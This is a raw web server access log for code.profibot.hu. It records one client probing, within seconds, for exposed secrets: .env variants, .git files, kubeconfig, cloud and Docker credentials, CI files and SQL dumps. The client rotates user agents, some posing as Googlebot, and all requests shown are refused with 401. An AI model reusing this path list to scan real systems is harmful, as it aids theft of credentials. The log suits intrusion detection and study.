code.profibot.hu "/dump.sql" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/admin/info.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/.env.vite" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/svelte.config.js" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/.svelte-kit/output/client/_app/env.js" [Client 216.81.248.13] [Length 662] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/.azure/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/.git/info/refs" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/api/v2/.env" [Client 216.81.248.13] [Length 661] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/backend/.env.production" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/.env.test" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/go/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/.dockercfg" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/.env.production" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/payments/.env.production" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/fastapi/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/kubeconfig.yaml" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/.git/hooks/pre-commit" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/dist/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/build/root.js" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/.git/refs/remotes/origin/HEAD" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/backups/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/.env.development.local" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/deployments/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/buildspec.yml" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/override/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/golang/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/_app/immutable/chunks/singletons.js" [Client 216.81.248.13] [Length 662] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/ecommerce/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/config.env" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/store/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/buildspec.yaml" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/.aws/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/netlify/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/Jenkinsfile" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/app/.env.production" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/_app/immutable/entry/app.js" [Client 216.81.248.13] [Length 662] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/.git/refs/remotes/origin/main" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/checkout/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/out/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/.env.bak" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/.git/hooks/post-receive" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/k8s/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/.envrc.local" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/magento2/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/helm/values-production.yaml" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/charts/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/.docker.env" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/system/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/.git/info/exclude" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/configmap.yaml" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/.git/objects/info/packs" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/app/entry.client.tsx" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/env.txt" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/.next/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/rails/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/.env.example" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/.git/refs/heads/staging" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/planetscale/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/.travis/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/includes/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/private/.env.production" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:53 +0000] - 401 401 - GET https code.profibot.hu "/domains/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/storage/logs/laravel.log" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/docker-compose.env" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/bootstrap/cache/services.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/gcp/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.production.local" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.docker" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.github/workflows/docker.yml" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/cargo/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/secrets/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/log/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/static/js/main.js" [Client 216.81.248.13] [Length 661] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/docker-compose.prod.yml" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/docker/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.circleci/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.github/actions/action.yml" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/src/env.d.ts" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.git/hooks/pre-push" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/heroku/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/packages/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.local" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.txt" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.github/workflows/production.yml" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.save" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.defaults" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.development" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/app/etc/.env" [Client 216.81.248.13] [Length 661] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.drone.yml" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/pods/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.backup" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.private/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/configuration.inc.php.bak" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/kubernetes/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.astro/types.d.ts" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.swp" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.git/description" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.staging" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.git/ORIG_HEAD" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/config.inc.php.bak" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/backup.sql" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.orig" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env~" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.git/index" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/storage/framework/cache/data" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.vercel/project.json" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 